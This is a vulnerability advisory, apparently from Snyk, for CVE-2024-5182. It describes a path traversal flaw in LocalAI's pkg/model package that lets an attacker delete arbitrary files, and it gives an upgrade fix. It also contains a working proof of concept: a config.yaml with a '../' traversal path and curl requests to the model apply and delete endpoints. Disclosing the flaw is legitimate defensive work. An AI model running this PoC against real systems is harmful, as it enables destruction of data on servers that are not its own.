Path Traversal Affecting github.com/mudler/localai/pkg/model package, versions <2.16.0
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMMUDLERLOCALAIPKGMODEL-7315129
- published 21 Jun 2024
- disclosed 20 Jun 2024
- credit mvlttt
Introduced: 20 Jun 2024
CVE-2024-5182 Open this link in a new tabHow to fix?
Upgrade github.com/mudler/LocalAI/pkg/model to version 2.16.0 or higher.
Overview
Affected versions of this package are vulnerable to Path Traversal through the model parameter during the model deletion process. An attacker can delete arbitrary files by crafting a request with a manipulated model parameter.
PoC
Create a file named deleteme.txt in the /tmp folder.
Save the following code as config.yaml:
name: "delete_test"
parameters:
model: ../../../../../../../../tmp/deleteme.txt
usage: |
foo
Start a python http server:
python3 -m http.server
Add a model.
curl http://localhost:8080/models/apply -X POST -H "Content-Type: application/json" -d '{"config_url":"<exploit_server>/config.yaml","id":""}'
The model name is the md5 hash of config_url, use this command to calculate this value:
echo -n "<exploit_server>/config.yaml" | md5sum
Delete model:
curl http://localhost:8080/models/delete/f26ecc271c5e79202b71619382c0c22b -X POST
When the process is completed, you will see that the file has been deleted.